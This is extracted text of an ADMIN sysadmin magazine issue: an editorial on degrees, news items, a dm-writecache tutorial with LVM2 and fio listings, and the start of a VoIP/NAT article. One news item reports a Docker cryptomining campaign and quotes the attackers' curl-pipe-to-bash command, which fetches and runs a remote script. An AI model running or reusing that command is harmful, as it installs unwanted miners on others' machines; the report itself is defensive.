Вы находитесь на странице: 1из 103

EXCHANGE

FREE
DVD HYBRID AGENT AWS Lambda

ADMIN
ADMIN
Network & Security

Network & Security

AWS Lambda
Scale up and save with serverless
monitoring in the cloud

dm-writecache
Improve random write
throughput to slow disks

Secure Public/Private Cloud


Ansible Playbooks + AWS scripts

Exchange Hybrid Agent


Migrating mailboxes to
Exchange Online

Optimizing Storage Regex Vulnerabilities


Finding new bottlenecks in Avoiding the dreaded
nftables
Better performance,
the age of fast storage ReDoS simpler syntax

Performance Dojo Prowler ADMIN US$ 15.99


Benchmarking tools AWS security tool Issue 55 CAN$ 18.50

55

0 29074 86640 4
WWW.ADMIN-MAGAZINE.COM
MAG DOWN LOAD.oRG

LATEST MAGAZINES
HIGH QUAllTY TRUE-PDF
MAG DOWN LOAD.ORG
Welcome to ADMIN W E LCO M E

Educating a Sys Admin


Education is important, but is it important in technology-related fields? The widely held opinion is that educa-
tion is not as important for techies.
I recently had a friendly debate with a colleague about whether system administrators need a degree. By degree,
we meant an associate’s, bachelor’s, master’s, or other equivalent educational certificate from an accredited col-
lege or university. Spoiler: We both agreed that a degree isn’t required. However, the debate didn’t end there be-
cause, in my opinion, professionals who are in professional positions should have a degree.
Now, having said that, I’ve never heard of a degree program in system administration – at least not at the bach-
elor’s level or beyond. Some two-year programs offer system administration as part of their IT-related curriculum,
but I know of no formal computer information systems (CIS), management information systems (MIS), informa-
tion systems (IS), or information technology (IT) degree programs in system administration. To be perfectly clear,
we were discussing Linux system administration, but I’m not sure the reference platform matters.
My argument was that entry-level admins don’t need a degree, but most companies offer tuition assistance and
any non-degreed professional should be required to obtain a degree as part of the hiring contract. As I told him,
I’ve worked with degreed and non-degreed sys admins and managers. I believe I even had senior managers or
director-level managers that held no degrees. To my surprise, they got the jobs and managed (no pun intended)
to maintain themselves in their respective positions. Unfortunately, during the 1990s, one could bluff one’s way
into a good IT or IT management job with no experience. It also helped to have friends in certain positions, but
that’s another story – perhaps for my memoir.
His argument was that he doesn’t see a need for IT personnel at any level to have a degree. He didn’t offer any
explanation. I think part of my colleague’s opinion comes from the fact that he came into the IT field from far
outside of it – just as I did. If you were born before 1990, you probably came to IT from another discipline be-
cause the job market was wide open and not enough people with a background in managing computer systems
could be found to fill the jobs. Plus, the only IT-related degrees available were for programming. The whole IT, IS,
MIS, CIS, Cyber Security degree thing started in the 1990s and later.
My opinion comes from my own history and experience with degreed vs. non-degreed professionals in IT, and
let me state here that I’m not sure it really matters from what field you came to IT. I’ve worked with people
from a variety of professions. One person had a PhD in physics, one was an
electrical engineer, one had been a secretary, one had been an office
assistant, one was a mechanic, one was a videographer, and I was a
chemist. So, the IT field is full of people from diverse backgrounds.
In fact, I’ll make an even more controversial statement here by stat-
ing that the best IT people I’ve ever worked with didn’t have any
educational background in IT, IS, MIS, and so on. They were all
degreed and very smart people, but none had a related degree.
I’m not sure an IT-related degree is great for the more technical
positions, but certainly you want people who are analytical and
technical. Yes, I know there are people who are self-educated
who can meet those criteria, and they can work well with others
with a positive attitude. My point is that a degree plus technical
and analytical skills set a person apart from the tech hobbyist
and techie wannabes.
My best advice is to educate yourself through certification
courses, college courses, and online training opportunities. If
you’re lucky enough to score an IT job without a degree, go
for it, but also go for a degree. Negotiate education as part
of your hiring contract if your employer doesn’t do so. You’ll
never regret getting an education, and you’ll never have to
apologize or make excuses for not having one. To summarize,
I think education is important and everyone in a professional
technical or managerial IT position should have a formal edu-
cation to some degree. And yes, I know what I did there.
Ken Hess • Senior Editor

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 55 3
S E RV I C E Table of Contents

ADMIN Network & Security

Features Tools Containers and Virtualization

This issue emphasizes performance Save time and simplify your workday Virtual environments are becoming
tuning, tweaking, and adaptations with with these useful tools for real-world faster, more secure, and easier to set
various tools and techniques. systems administration. up and use. Check out these tools.

10 dm-writecache 26 Exchange Hybrid Agent 36 FAI.me


This Linux kernel module lets you gain a Ease migration from a local Exchange If you are looking for a way to build
noticeable improvement in random write environment to Exchange Online. images quickly and easily, FAI.me is the
throughput writing to slower disk devices. place to go.

42 New S3 Services at Amazon


Amazon has new storage classes that
address different usage profiles.

30 Rook
Ceph distributed storage and
Kubernetes container orchestration
come together.
16 VoIP and NAT
Secure transparent IP address
transitions through NAT firewalls and 46 Prowler for AWS Security
gateways for Voice over IP. An AWS security best practices
assessment, auditing, hardening, and
forensics readiness tool.

News Security

Find out about the latest ploys and Use these powerful security tools
toys in the world of information to protect your network and keep
22 SchedViz technology. intruders in the cold.
Visualize how the Linux kernel scheduler
allocates jobs among cores and the 8 News 52 Regex Vulnerabilities
performance consequences. • Canonical now offers an Ubuntu Pro Regular expressions are invaluable for
image for AWS checking data, but a vulnerability could
• Vulnerable Docker instance sought make them ripe for exploitation.
out by Monero malware
• Cumulus Networks enhances their 54 nftables
network-specific Linux The latest packet filter implementation
• SUSE adds SUSE Linux Enterprise to promises better performance and
the Oracle Cloud Infrastructure simpler syntax and operation.

4 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M
Table of Contents S E RV I C E

46 Prowler for AWS Security


16 VoIP and NAT With the use of just a handful of
Correct mapping of internal to exter- Prowler's many features, you can
nal IP addresses is essential to en- test against industry-consensus
able unhindered VoIP communication benchmarks from the Center for
through NAT gateways and firewalls. Internet Security (CIS).

Management Nuts and Bolts

Use these practical apps to extend, Timely tutorials on fundamental


simplify, and automate routine admin techniques for systems
tasks. administrators.

60 Loki 78 Profiling Python Code


Grafana’s Loki is a good replacement Profiling — as a whole or by function —
candidate for the Elasticsearch, shows where you should spend time
Logstash, and Kibana (ELK) combination speeding up your programs.
in Kubernetes environments.

15.1
64-BIT
64 Serverless Uptime Monitoring 88 Fibre Channel SAN
Monitoring with AWS Lambda serverless Bottlenecks
technology reduces costs and scales to Discover the possible bottlenecks in
your infrastructure automatically. Fibre Channel storage area networks
and learn how to resolve them.

92 initramfs and dracut


If your Linux system is failing to boot,
the dracut tool can be a convenient way
to build a new RAM disk.

70 Ansible Hybrid Cloud


Extending your data center temporarily
into the cloud during a customer rush
might not be easy, but it can be done,
thanks to Ansible’s Playbooks and some
AWS scripts.

Service

3 Welcome
94 Performance Tuning Dojo
4 Table of Contents
6 On the DVD
Your sensei reveals three of his favorite
benchmarking tools: time, hyperfine,
See p 6 for details
98 Call for Papers
and bench.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 55 5
S E RV I C E On the DVD

OpenSUSE Leap 15.1


(Install Version, NOT Live)

On the DVD
OpenSUSE Leap is a community distribution that shares
a common code base with SUSE Linux Enterprise (SLE)
and coordinates with SLE releases (i.e., SLE is also in
version 15). SUSE recommends Leap for “Sysadmins,
Enterprise Developers, and ‘Regular’ Desktop Users.”
Please note that the image on this DVD is not the Live
version and will try to install the new operating system.
Q Released December 2019
Q Gnome or KDE (Plasma 5.12) desktop, as well as
lightweight options
Q Appropriate for traditional and software-defined
infrastructure
Q Comprehensively tested for hardened codebase

Resources

[1] OpenSUSE Leap 15.1:


[https://software.opensuse.org/distributions/leap/15_1]
DEFECTIVE DVD? [2] Release notes: [https://doc.opensuse.org/release-notes/
Defective discs will be replaced, email: cs@admin-magazine.com
x86_64/openSUSE/Leap/15.1/]
While this ADMIN magazine disc has been tested and is to the best of our
knowledge free of malicious software and defects, ADMIN magazine cannot [3] Product flyer: [https://www.suse.com/media/flyer/opensue_
be held responsible and is not liable for any disruption, loss, or damage to leap_built_to_scale_and_to_exceed_your_expectations_flyer.pdf]
data and computer systems related to the use of this disc.

6 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M
NEWS ADMIN News

News for Admins

Tech News
Canonical Now Offers an Ubuntu Pro Image for AWS
Ubuntu rules the cloud. According to The Cloud Market (https://thecloudmarket.com/stats#/by_plat-
form_definition), Ubuntu is the most widely used cloud image used on the Amazon Elastic Compute
Cloud (with nearly 370K images deployed). Not one to be satisfied with being at the top of the
digital heap, Canonical (https://canonical.com/) – the company behind Ubuntu (https://ubuntu.com/) – has
released a new version of their venerable Ubuntu platform.
Ubuntu Pro was created specifically for Amazon Web Services. This new image ships with the
Canonical standard Ubuntu Amazon Machine Image and layers on top of that security and compli-
ance subscriptions. Specifically, Ubuntu Pro includes:
• Up to 10 years of package and security updates for Ubuntu 18.04, and up to eight years for 14.04
and 16.04
• Kernel Livepatch for continuous security patching without reboots
• Customized FIPS and Common Criteria EAL-compliant components (for environments that re-
quire FedRAMP, PCI, HIPAA, and ISO compliance)
• Patch coverage for Ubuntu’s infrastructure and app repositories for all types of open source services
• System management with Landscape
• Integration with AWS security and compliance features, such as AWS Security Hub and AWS
CloudTrail (applicable from 2020)
• Subscriptions available for Ubuntu Advantage support packages (https://ubuntu.com/support)
Ubuntu Pro is available via the AWS Marketplace (https://aws.amazon.com/marketplace/search/results?x=0&
y=0&searchTerms=ubuntu+pro) and the prices range from free to $0.33 per hour (for software plus AWS
usage fees).

Vulnerable Docker Instance Sought Out by Monero Malware


Near the end of November it was discovered that some Docker instances were vulnerable to a specific
attack vector (https://www.zdnet.com/article/a-hacking-group-is-hijacking-docker-systems-with-exposed-api-endpoints/) that
would allow the injection of Monero mining programs. During the two days the target campaign was
live, over 14.82 Monero (XMR) was mined. That amount translates to roughly $800.
Although that amount wasn’t enough to turn heads, what was significant in this vulner-
ability was the amount of scans that occurred. During that campaign, hackers scanned up
to 59,000 IP networks for exposed API endpoints. Once attackers located an exposed end-
point, an Alpine Linux OS container was deployed to run the command
Lead Image © vlastas, 123RF.com

chroot /mnt /bin/sh -c 'curl -sL4 http://ix.io/1XQa | bash;

(which downloads a bash script that would install the XMRig cryptocurrency miner).
The issue was discovered by security firm Bad Packets LLC. Bad Packets also found
that the malware contained a self-defense measure that not only disables security, but
© wamsler, 123R
F.com shuts down processes associated with rival cryptocurrency-mining botnets.

8 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M
ADMIN News NEWS

To avoid such a vulnerability, Troy Mursch (cofounder and chief research officer of Bad Packets
LLC) says Docker container admins should immediately check to see if they are exposing API end-
points to the Internet. If so, admins should close exposed ports and stop/delete any unrecognized
containers.

Cumulus Networks Enhances Their Network-Specific Linux


Cumulus Linux is a full-featured Linux operating system designed specifically for the networking
industry. Cumulus supports a wide array of networking hardware (https://cumulusnetworks.com/products/
hardware-compatibility-list/) and is fully compliant with the Open Compute Project’s networking specifi-
cation (including the Open Network Install Environment).
With the release of Cumulus Linux 4.0, there are a number of changes,
so make sure you are informed before you upgrade.
First and foremost, Cumulus Linux 4.0 is now based on Debian
Buster (version 10) and includes the Linux 4.19 kernel. Along with this
kernel, Meltdown and Spectre fixes are finally (and fully) up to date.
The next most important advancement for Cumulus Linux is the
integration of switchdev. Switchdev is an open source in-kernel ab-
straction model that provides a standardized method of programming
switch ASICs and speeds up development time.
Cumulus Linux 4.0 has added a few new supported platforms,
such as Edgecore Minipack AS8000 (100G Tomahawk 3), Mellanox
SN3700C (100G Spectrum-2), Mellanox SN3700 (200G Spectrum-2),
and HPE SN2345M (100G Spectrum).
Other new features to Cumulus Linux include the ability to use
apt-get upgrade to a specific kernel release, EVPN BUM traffic © LiuZishan, 12
3RF.com
handling (using PIM-SM on Broadcom switches), PIM active-active
with MLAG, port security on Broadcom switches, WJH support on Mellanox switches (to
stream detailed/contextual telemetry of off-box analysis), a new backup and restore utility, FR-
Routing daemons and daemons.conf files have been merged into the daemons file, Zebra now
enabled by default (in daemons file), MAC learning is disabled by default on all VXLAN bridge
ports, and much more.
Read about all of the new changes to Cumulus Linux online (https://support.cumulusnetworks.com/hc/en-
us/articles/360038231814-What-s-New-and-Different-in-Cumulus-Linux-4-0-0?mobile_site=true).

SUSE Adds SUSE Linux Enterprise to the Oracle Cloud Infrastructure


SUSE (a Gold-level member of Oracle PartnerNetwork) recently announced that SUSE Enterprise
Linux is now a part of Oracle Cloud Infrastructure. This move also brings Oracle into the ever-
growing membership of the SUSE Partner Program for Cloud Service Providers.
Both SUSE Linux Enterprise and SUSE Linux Enterprise Server for SAP Applications will allow
customers to leverage high performance virtual machines and bare metal compute for Linux-based
workloads. According to Naji Almahmoud, SUSE VP of Global Alliances, “SUSE’s collaboration
with Oracle Cloud Infrastructure allows us to meet growing customer demand for the agility and
cost benefits of cloud-based business-critical applications....”
Via a bring-your-own-subscription arrangement, SUSE customers will be able to transfer existing
SUSE subscriptions to Oracle Cloud Infrastructure, so they can deploy new workloads or
migrate existing workloads from their current data center to Oracle
Cloud. There will be no additional cost imposed by SUSE for this
new addition, and customers will be able to continue taking ad-
vantage of their existing relationship with SUSE support.
Vinay Kumar, VP of Product Management, Oracle Cloud Infra-
structure, said, “SUSE Linux Enterprise Server on Oracle Cloud
Infrastructure offers enterprises more choice as they transition to
the cloud.” Kumar added, “Oracle and SUSE have a common goal of
providing open and reliable infrastructure to support our customers’
digital transformation.”

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 55 9
F E AT U R E S Linux dm-writecache

Linux device mapper writecache

Kicking
It Into
Overdrive
With the dm-writecache Linux kernel module, you can gain a noticeable improvement in random write
throughput when writing to slower disk devices. By Petros Koutoupis

The idea of block I/O caching isn’t What Is I/O Caching? for read operations, the general idea
revolutionary, but it still is an extremely is to read it from the slower device
complex topic. Technically speaking, A computer cache is a component no more than once and maintain
caching as a whole is complicated and (typically leveraging some sort of that data in memory for as long as it
a very difficult solution to implement. It performant memory) that temporar- is still needed. Historically, operat-
Lead Image © lightwise, 123R.com

all boils down to the I/O profile of the ily stores data for current write and ing systems have been designed to
ecosystem or server on which it is be- future read I/O requests. In the event enable local (and volatile) random
ing implemented. Before I dive right in, of write operations, the data to be access memory (RAM) to act as
I want to take a step back, so you un- written is staged and will eventu- this temporary cache. Although it
derstand what I/O caching is and what ally be scheduled and flushed to the performs at stellar speeds, it has its
it is intended to address. slower device intended to store it. As drawbacks:

10 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M
Linux dm-writecache F E AT U R E S

but as a research project developed


by Dr. Ming Zhao through his sum-
mer internship at IBM Research. The
dm-cache module was integrated into
the Linux kernel tree as of version
3.9. It is an all-purpose caching mod-
ule and is written and designed to
run all of the above caching methods,
with the exception of write-around
Figure 1: The data performance gap as you move further away from the CPU. caching.

Q It is expensive. Common Methods of bcache


Q Capacities are small. Caching
Q More importantly, it is volatile. If Very similar to dm-cache, bcache too is
power is removed from RAM, data In this discussion, note that target a Linux kernel driver, although it dif-
is lost. refers to the backing store (i.e., the fers in a few ways. For instance, the
As unrealistic as it might seem, the slower HDD). However, you should user is able to attach more than one
ultimate goal is never to touch the understand that the biggest pain SSD as a cache and it is designed to
slower device storing your data with point for a slower HDD is not ac- reduce write amplification by turning
either read or write I/O requests cessing sectors for read and write random write operations into sequen-
(Figure 1). Fortunately, other forms of workloads sequentially, it is random tial writes.
performant, cheap, high-density, and workloads and, to be more spe- Write amplification is an undesir-
persistent memory devices exist that cific, random small I/O workloads able phenomenon wherein the
do not perform as fast as RAM but that are the issue. The purpose of amount of information physically
that do still perform extremely well a cache is to alleviate a lot of the written to the SSD is a multiple of
– enough so that I will demonstrate burden for the drive to seek new the logical amount intended to be
their use in the following exercise sector locations for 4K, 8K, or other written. In the short term, the ef-
with noticeable results. small I/O requests. Some of the fects of write amplification are not
more common caching methods or felt immediately, but in the long
Using I/O Caching modes are: term and as the medium begins to
Q Writeback caching. In this mode, enforce its programmable erase (PE)
Solid State Drives (SSDs) brought newly written data is cached but cycles, making way for new write
performance to the forefront of not immediately written to the des- data, the life of each NAND cell is
computing technologies, and tination target. reduced.
their adoption is increasing not Q Write-through caching. This
only in the data center but also in mode writes new data to the target dm-writecache
consumer-grade products. Unlike while still maintaining it in cache
its traditional spinning hard disk for future reads. Fairly new to the Linux caching
drive (HDD) counterpart, SSDs Q Write-around caching or a general- scene, dm-writecache was officially
comprise a collection of computer purpose read cache. Write-around merged into the 4.18 Linux kernel.
chips (non-volatile NAND memory) caching avoids caching new write Unlike the other caching solutions
with no movable parts. Therefore data and instead focuses on cach-
SSDs are not kept busy seeking to ing read I/O operations for future Listing 1: Storage Volumes
new drive locations and, in turn, read requests. $ cat /proc/partitions
introducing latency. As great as this Many userspace libraries, tools, and major minor #blocks name
sounds, SSDs are still more expen- kernel drivers exist to enable high-
sive than HDDs. HDD prices have speed caching. I will describe some
7 0 91264 loop0
settled to around $0.03/GB; SSD of those more commonly used before
7 1 56012 loop1
prices vary but sit at around $0.13- eventually diverting attention to just
$0.15/GB. At scale, that price gap dm-writecache. 7 2 90604 loop2
makes a world of difference. 259 0 244198584 nvme0n1
To keep costs down and still invest 8 0 488386584 sda
dm-cache
in the needed capacities, one logical 8 1 1024 sda1
solution is to buy a large number of The dm-cache component of the Linux 8 2 488383488 sda2
HDDs and a small number of SSDs kernel’s device mapper has been 8 16 6836191232 sdb
and enable the SSDs to act as a per- around for quite some time – at least
8 32 6836191232 sdc
formant cache for the slower HDDs. since 2006. It originally made its de-

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 55 11
F E AT U R E S Linux dm-writecache

mentioned already, the focus of Other Caching Tools distribution running a 4.18 kernel or
dm-writecache is strictly writeback later and to have a version of Logical
caching and nothing more: no read Tools earning honorable mention Volume Manager 2 (LVM2) installed
caching, no write-through caching. include: at v2.03.x or above. I will also show
The thought process for not caching Q RapidDisk. This dynamically al- you how to enable a dm-writecache
reads is that read data should already locatable memory disk Linux volume without relying on the LVM2
be in the page cache, which makes module uses RAM and can also be framework and instead manually in-
complete sense. used as a front-end write-through voke dmsetup.
and write-around caching node for
Listing 2: Volume Labels slower media. Identifying and Configuring
Q Memcached. A cross-platform us-
$ sudo pvs
erspace library with an API for ap-
Your Environment
PV VG Fmt Attr PSize PFree
/dev/nvme0n1 lvm2 --- <232.89g <232.89g plications, Memcached also relies Identifying the storage volumes and
/dev/sdb lvm2 --- <6.37t <6.37t on RAM to boost the performance configuring them is a pretty straight-
of databases and other applica- forward process (Listing 1).
tions. In my example, I will be using both
Listing 3: Volume Group Created Q ReadyBoost. A Microsoft product, /dev/sdb and /dev/nvme0n1. As you
$ sudo vgs ReadyBoost was introduced in might have already guessed, /dev/
VG #PV #LV #SN Attr VSize VFree Windows Vista and is included in sdb is my slow device, and /dev/
vg-cache 2 0 0 wz--n- 6.59t 6.59t later versions of Windows. Similar nvme0n1 is my NVMe fast device.
to dm-cache and bcache, ReadyBoost Because I do not necessarily want
enables SSDs to act as a cache for to use my entire SSD (the rest could
Listing 4: Physical Volumes Present slower HDDs. be used as a separate standalone
$ sudo pvs or cached device elsewhere), I will
PV VG Fmt Attr PSize PFree Working with dm-writecache place both the SSD and HDD into a
/dev/nvme0n1 vg-cache lvm2 a-- 232.88g 232.88g single LVM2 volume group. To be-
/dev/sdb vg-cache lvm2 a-- <6.37t <6.37t The only prerequisites for using gin, I label the physical volumes for
dm-writecache are to be on a Linux LVM2:

Listing 5: Slow Logical Volume Created $ sudo pvcreate /dev/nvme0n1


$ sudo lvs vg-cache -o+devices Physical volume "/dev/nvme0n1" U
LV VG Attr LSize Pool Origin Data% Meta% Move Log Cpy%Sync Convert Devices successfully created.
slow vg-cache -wi-a----- <5.93t /dev/sdb(0) $ sudo pvcreate /dev/sdb
Physical volume "/dev/sdb" U
successfully created.
Listing 6: Test Slow Logical Volume
$ sudo fio --bs=4k --ioengine=libaio --iodepth=32 --size=10g --direct=1 --runtime=60 \ Then, I verify that the volumes
--filename=/dev/vg-cache/slow --rw=randwrite --numjobs=1 --name=test
have been appropriately labeled
(Listing 2).
test: (g=0): rw=randwrite, bs=(R) 4096B-4096B, (W) 4096B-4096B, (T) 4096B-4096B, ioengine=libaio, iodepth=32
Next, I add both volumes into a new
fio-3.1 volume group labeled vg-cache,
Starting 1 process
Jobs: 1 (f=1): [w(1)][100.0%][r=0KiB/s,w=1401KiB/s][r=0,w=350 IOPS][eta 00m:00s] $ sudo vgcreate vg-cache U
/dev/nvme0n1 /dev/sdb
test: (groupid=0, jobs=1): err= 0: pid=3104: Sat Oct 12 14:39:08 2019
Volume group "vg-cache" U
write: IOPS=352, BW=1410KiB/s (1444kB/s)(82.8MiB/60119msec) successfully created
[ ... ]
Run status group 0 (all jobs): verify that the volume group has been
created as seen in Listing 3, and
WRITE: bw=1410KiB/s (1444kB/s), 1410KiB/s-1410KiB/s (1444kB/s-1444kB/s), io=82.8MiB (86.8MB), run=60119-60119msec
verify that both physical volumes are
within it, as in Listing 4.
Listing 7: Fast Logical Volume Created Say I want to use 90 percent of the
$ sudo lvs slow disk: I will carve a logical vol-
LV VG Attr LSize Pool Origin Data% Meta% Move Log Cpy%Sync Convert ume labeled slow from the volume
fast vg-cache -wi-a----- 10.00g group, use that slow device,
slow vg-cache -wi-a----- 5.93t
$ sudo lvcreate -n slow -l90%FREE U

12 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M
Linux dm-writecache F E AT U R E S

vg-cache /dev/sdb Listing 8: Fast Logical Volume Created from NVMe Drive
Logical volume "slow" created.
$ sudo lvs vg-cache -o+devices
LV VG Attr LSize Pool Origin Data% Meta% Move Log Cpy%Sync Convert Devices
and verify that the logical volume has
fast vg-cache -wi-a----- 10.00g /dev/nvme0n1(0)
been created (Listing 5). slow vg-cache -wi-a----- 5.93t /dev/sdb(0)
Using the fio benchmarking utility, I
run a quick test with random write I/
Os to the slow logical volume and get Listing 9: <fio> Test
a better understanding of how poorly $ sudo fio --bs=4k --ioengine=libaio --iodepth=32 --size=10g --direct=1 --runtime=60 \
it performs (Listing 6). --filename=/dev/vg-cache/fast --rw=randwrite --numjobs=1 --name=test
I see an average of 1.4 kibibytes test: (g=0): rw=randwrite, bs=(R) 4096B-4096B, (W) 4096B-4096B, (T) 4096B-4096B, ioengine=libaio, iodepth=32
per second (KiBps) throughput. Al- fio-3.12
though that number is not great, it Starting 1 process
is expected when sending a number Jobs: 1 (f=1): [w(1)][100.0%][w=654MiB/s][w=167k IOPS][eta 00m:00s]
of small random writes to an HDD. test: (groupid=0, jobs=1): err= 0: pid=1225: Sat Oct 12 19:20:18 2019
Remember, with mechanical and write: IOPS=168k, BW=655MiB/s (687MB/s)(10.0GiB/15634msec); 0 zone resets
movable components, a large per- [ ... ]
centage of the time is spent seeking Run status group 0 (all jobs):
to new locations on the disk platters. WRITE: bw=655MiB/s (687MB/s), 655MiB/s-655MiB/s (687MB/s-687MB/s), io=10.0GiB (10.7GB), run=15634-15634msec
If you recall, this method introduces
latency and will take much longer
for the disk drive to return with an Listing 10: Conversion
acknowledgment that the write is
$ sudo lvs -a vg-cache -o devices,segtype,lvattr,name,vgname,origin
persistent to disk. Devices Type Attr LV VG Origin
Now, I will carve out a 10GB logi- /dev/nvme0n1(0) linear Cwi-aoC--- [fast] vg-cache
cal volume from the SSD and label slow_wcorig(0) writecache Cwi-a-C--- slow vg-cache [slow_wcorig]
it fast, /dev/sdd(0) linear owi-aoC--- [slow_wcorig] vg-cache

$ sudo lvcreate -n fast -L 10G U


vg-cache /dev/nvme0n1 Listing 11: Run Ęű
$ sudo fio --bs=4k --ioengine=libaio --iodepth=32 --size=10g --direct=1 --runtime=60 \
verify that the logical volume has --filename=/dev/vg-cache/slow --rw=randwrite --numjobs=1 --name=test
been created (Listing 7) and verify test: (g=0): rw=randwrite, bs=(R) 4096B-4096B, (W) 4096B-4096B, (T) 4096B-4096B, ioengine=libaio, iodepth=32
that it is created from the NVMe drive fio-3.12
(Listing 8). Starting 1 process
Like the example above, I will run Jobs: 1 (f=1): [w(1)][100.0%][w=475MiB/s][w=122k IOPS][eta 00m:00s]
another quick fio test with the same test: (groupid=0, jobs=1): err= 0: pid=1634: Mon Oct 14 22:18:59 2019
write: IOPS=118k, BW=463MiB/s (485MB/s)(10.0GiB/22123msec); 0 zone resets
parameters as earlier (Listing 9).
[ ... ]
Wow! You can see a night and day
Run status group 0 (all jobs):
difference here of about 655MiBps
WRITE: bw=463MiB/s (485MB/s), 463MiB/s-463MiB/s (485MB/s-485MB/s), io=10.0GiB (10.7GB),
throughput. run=22123-22123msec
If you have not already, be sure to
load the dm-writecache kernel module:
Listing 12: Run Ęű to New Device
$ sudo modprobe dm-writecache
$ sudo fio --bs=4k --ioengine=libaio --iodepth=32 --size=10g --direct=1 --runtime=60 \
--filename=/dev/mapper/wc --rw=randwrite --numjobs=1 --name=test
To enable the writecache volume via
test: (g=0): rw=randwrite, bs=(R) 4096B-4096B, (W) 4096B-4096B, (T) 4096B-4096B, ioengine=libaio, iodepth=32
LVM2, you will first need to deac-
fio-3.12
tivate both volumes to ensure that
Starting 1 process
nothing is actively writing to them. To
deactivate the SSD, enter: Jobs: 1 (f=1): [w(1)][100.0%][eta 00m:00s]
test: (groupid=0, jobs=1): err= 0: pid=7055: Sat Oct 12 19:09:53 2019
$ sudo lvchange -a n vg-cache/fast write: IOPS=34.8k, BW=136MiB/s (143MB/s)(9.97GiB/75084msec); 0 zone resets
[ ... ]
To deactivate the HDD, enter: Run status group 0 (all jobs):
WRITE: bw=136MiB/s (143MB/s), 136MiB/s-136MiB/s (143MB/s-143MB/s), io=9.97GiB (10.7GB), run=75084-75084msec
$ sudo lvchange -a n vg-cache/slow

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 55 13
F E AT U R E S Linux dm-writecache

Now, convert both volumes into a $ sudo blockdev --getsz /dev/vg-cache/slow $ sudo dmsetup message /dev/mapper/U
single cache volume, 12744687616 wc 0 flush

$ sudo lvconvert --type writecache U You will plug this number into the Now it is safe to enter
--cachevol fast vg-cache/slow next command and create a write-
cache device mapper virtual node $ dmsetup remove /dev/mapper/wc
activate the new volume, called wc with a 4K blocksize:
to remove the mapping.
$ sudo lvchange -a y vg-cache/slow $ sudo dmsetup create wc --table U
"0 78151680 writecache s U
Conclusion
and verify that the conversion took /dev/vg-cache/slow /dev/U
effect (Listing 10). vg-cache/fast 4096 0" By using the newly introduced
Now it’s time to run fio (Listing 11). dm-writecache device mapper Linux
At about 460MiBps, it’s almost 330 Assuming that the command returns kernel module, you are able to
times faster than the plain old HDD. without an error, a new (virtual) de- achieve a noticeable improvement
This is awesome. Remember, the vice node will be accessible from / in random write throughput when
NVMe is a front-end cache to the dev/mapper/wc. This is the dm-write- writing to slower disk devices.
HDD, and although all writes are cache mapping. Now you need to run Also, nothing is preventing you
hitting the NVMe, a background fio again, but this time to the newly from using the remainder of the
thread (or more than one) schedules created device (Listing 12). NVMe device in the original vol-
flushes to the backing store (i.e., Although it isn’t near the standalone ume group and mapping it as a
the HDD). NVMe speeds, you can see a wonderful cache to other, slower devices on
If you want to remove the volume, improvement of random write opera- your system. Q
type: tions. At 90 times the original HDD per-
formance, you observe a throughput of
$ sudo lvconvert --splitcache vg-cache/slow 136MiBps. I am not entirely sure what The Author
parameters are not being configured for Petros Koutoupis is currently a senior perfor-
Now you are ready to map the NVMe the volume during the dmsetup create mance software engineer at Cray for its Lustre
drive as the writeback cache for the to match that of the earlier LVM2 ex- High Performance File System division. He is
slow spinning drive with dmsetup ample, but this is still pretty darn good. also the creator and maintainer of the Rapid-
(in the event that you do not have a To remove the device mapper cache Disk Project. Petros has worked in the data
proper version of LVM2 installed). To mapping, you first need to flush storage industry for well over a decade and has
invoke dmsetup, you first need to grab forcefully (and manually) all pending helped to pioneer many of the technologies
the block count of the slow device: write data to disk: unleashed in the wild today.

14 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M
F E AT U R E VoIP and NAT

Transparent SIP communication with NAT

Number, Please
We show you how to secure transparent IP address transitions through
NAT firewalls and gateways for Voice over IP. By Mathias Hein

Mapping internal IP addresses to ment of various strategies by the In- private and public IP addresses.
external IP addresses is essential for ternet Engineering Task Force (IETF) NAT uses tables to assign the IP ad-
Voice over IP (VoIP) communications for covering a wide environment with dresses of a private (internal) net-
through network address translation the available addresses. One of the in- work to public IP addresses (Figure
(NAT) gateways and firewalls. Session termediate solutions, called NAT (RFC 1). The internal IP addresses remain
Initiation Protocol (SIP) is the signal- 3022) [1] or PAT (port and address hidden. NAT services exchange the
ing protocol for establishing VoIP con- translation), uses conversion between sender and receiver IP addresses in
nections; however, SIP-based com-
munications have problems working
through firewalls and session border
controllers, and all too often, VoIP
calls or some unified communications
functions fail because of NAT. In this
article, I show you how IT manag-
ers can resolve these issues with the
session traversal utilities for NAT
(STUN), traversal using relays around
NAT (TURN), and Interactive Connec-
tivity Establishment (ICE) techniques
Lead Image © studiom1, 123RF.com

to ensure transparent transitions and


improve overall SIP security.

NAT Characteristics
Some years ago, the limited availabil-
ity of IP addresses led to the develop- Figure 1: NAT links the internal network with the Internet through the translation of IP addresses.

16 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M
VoIP and NAT F E AT U R E

the IP header. The simplest form of tive NAT mapping address. Any longs. If there is a match, the address
address conversion is known as static attempt by an external machine is converted and forwarded to the
NAT. Address translation converts a to send the packets to another ad- right IP address on the internal net-
private IP address sent from a private dress mapping will result in the work – theoretically.
address space into a public IP address packets being dropped. In practice, however, this process is
to be received in a public address far more complicated. For example,
space. In the reply packet, this con- PAT Mechanisms two internal machines communicate
version takes place in reverse order. with a common external IP address
The types of NAT systems include: The PAT mechanism maps all IP ad- and both transmit a DNS request to
Q Full cone NAT: IP address conver- dresses of a private network to a the DNS server operated by the ISP
sion takes place independently of single public IP address (Figure 2). for the company in question. The
a previous outbound connection In this way, a completely private net- DNS server operated by the ISP re-
on the basis of fixed address en- work only needs a single registered sides on the external network from
tries. Every user of the external public IP address. Some manufactur- the point of view of the DNS clients,
network can send their packets to ers also refer to the PAT function as which means that all DNS queries
the public IP port. The packets are “hidden NAT.” In practice, if two in- always pass through the NAT pro-
automatically forwarded from the ternal computers share an external IP cess and address conversion always
NAT system to the computer with address on the basis of the private IP takes place.
